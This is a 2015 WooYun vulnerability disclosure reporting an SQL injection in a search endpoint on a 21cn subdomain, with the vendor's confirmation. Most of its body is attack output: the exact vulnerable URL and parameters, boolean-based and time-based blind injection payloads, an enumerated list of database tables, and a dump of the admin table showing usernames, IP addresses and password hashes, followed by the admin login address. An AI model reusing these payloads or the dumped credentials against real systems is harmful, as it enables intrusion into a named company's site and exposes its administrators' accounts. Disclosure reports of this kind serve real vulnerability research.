当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112852

漏洞标题:世纪龙某站存在SQL注射漏洞

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 紫霞仙子

提交时间:2015-05-08 16:27

修复时间:2015-06-22 17:26

公开时间:2015-06-22 17:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-18: 细节向核心白帽子及相关领域专家公开
2015-05-28: 细节向普通白帽子公开
2015-06-07: 细节向实习白帽子公开
2015-06-22: 细节向公众公开

简要描述:

233

详细说明:

http://ts.21cn.com/Home/so (POST)
channelId=41&keywords=1&view=/article/article/search

漏洞证明:

---
Parameter: keywords (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channelId=41&keywords=1') AND 8761=8761 AND ('hILz' LIKE 'hILz&view=/article/article/search
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: channelId=41&keywords=1') AND (SELECT * FROM (SELECT(SLEEP(5)))AaoW) AND ('hnji' LIKE 'hnji&view=/article/article/search
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'jtsuser'@'59.36.102.149'
available databases [2]:
[*] information_schema
[*] jutousu
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 73834 |
| iic_reply | 43953 |
| iic_digg | 41251 |
| iic_log | 32647 |
| iic_post_sync | 15150 |
| iic_user_addres | 14712 |
| iic_digg_20131224 | 13041 |
| iic_post | 12630 |
| iic_post_com | 8575 |
| iic_reply_sync | 6180 |
| iic_area | 3407 |
| iic_collective_digg | 1831 |
| iic_access | 917 |
| iic_com | 753 |
| iic_recom | 641 |
| iic_collective_reply | 591 |
| iic_case | 586 |
| iic_merchant | 350 |
| iic_node | 271 |
| iic_captcha | 226 |
| iic_ipadmin | 96 |
| iic_feedback | 93 |
| iic_movice | 87 |
| iic_redblackdigg | 73 |
| iic_collective | 70 |
| iic_postkeyword | 66 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_hotpost | 42 |
| iic_role_account | 39 |
| iic_team | 37 |
| iic_collectivenews | 33 |
| iic_wxuser | 32 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 24 |
| iic_redblacklist | 24 |
| iic_article | 13 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_keyword | 7 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_post_dealwith_satisfaction | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+
Database: jutousu
Table: iic_admin
[8 entries]
+----+----------------+------+------------+------------+----------+------------------------------------------+
| id | ip | rbac | ctime | ltime | username | password |
+----+----------------+------+------------+------------+----------+------------------------------------------+
| 1 | 121.14.129.100 | 1 | 1357439115 | 1394700899 | root | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
| 6 | 59.36.102.177 | 2 | 1363850273 | 1391559612 | xinan | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
| 8 | | 3 | 1363856328 | 1363856328 | sale | cb486e69f7091c4b1d1f76fde175d69b08fe4745 |
| 9 | | 3 | 1363911999 | 1363911999 | new | bdb8465ce041d94a0e490564f2162dcc87d4a46a |
| 11 | 121.14.129.100 | 3 | 1381482461 | 1385456186 | caiy | 7c4a8d09ca3762af61e59520943dc26494f8941b |
| 12 | 121.14.129.100 | 3 | 1387177000 | 1387330288 | test | fb15a1bc444e13e2c58a0a502c74a54106b5a0dc |
| 14 | 121.14.129.100 | 3 | 1389577728 | 1389755015 | raoyw | 291b673d8750ec66c8691735bcd6da57b3cb5041 |
| 15 | 116.22.48.206 | 2 | 1390894685 | 1391653182 | xinwen | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
+----+----------------+------+------------+------------+----------+------------------------------------------+
后台地址:http://ts.21cn.com/admin/login

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-08 17:26

厂商回复:

感谢您对我们业务安全的关注,根据您的报告,问题已着手处理。

最新状态:

暂无


漏洞评价:

评论